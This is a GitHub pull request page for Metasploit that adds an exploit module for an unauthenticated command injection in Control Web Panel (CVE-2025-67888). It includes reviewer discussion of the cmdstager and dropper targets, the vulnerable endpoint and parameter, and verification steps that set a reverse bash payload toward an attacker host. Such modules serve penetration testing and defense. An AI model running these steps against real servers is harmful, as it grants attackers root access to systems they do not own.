-
Notifications
You must be signed in to change notification settings - Fork 14.7k
Adds module for Control Web Panel API Command Injection (CVE-2025-67888) #20806
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Conversation
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…y single-line conditional - Remove unnecessary return keyword
| when :unix_cmd | ||
| execute_command(payload.encoded) | ||
| when :linux_dropper | ||
| execute_cmdstager |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Using cmdstager is useful when we have space limitations. Are there space limitations, or can we just give the command to execute as-is?
If it is the 2000 byte limit on url, we probably do not need to use cmdstager.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@bwatters-r7 I tried to folloe the CmdStager docs pattern with two targets. Without the Linux Dropper target, native ELF payloads like linux/x64/meterpreter/reverse_tcp wouldn't work, users would be limited to cmd/unix/* payloads. cmd/unix/python/meterpreter works fine on the unix command target, so maybe the dropper is redundant? Happy to remove it if you think a simpler single target approach is better here.
…pears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding
Fixes #20788
Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)
This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.
What does this change do?
Adds
exploit/linux/http/control_web_panel_api_cmd_execwhich exploits a blind command injection via thekeyGET parameter in/admin/index.phpwhenapi=1is set. Successful exploitation grants root-level access.Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.
Files Added
modules/exploits/linux/http/control_web_panel_api_cmd_exec.rbdocumentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.mdVerification
msfconsoleuse exploit/linux/http/control_web_panel_api_cmd_execset RHOSTS <target>set RPORT 2031set SSL trueset LHOST <attacker>checkset payload cmd/unix/reverse_bashexploitReferences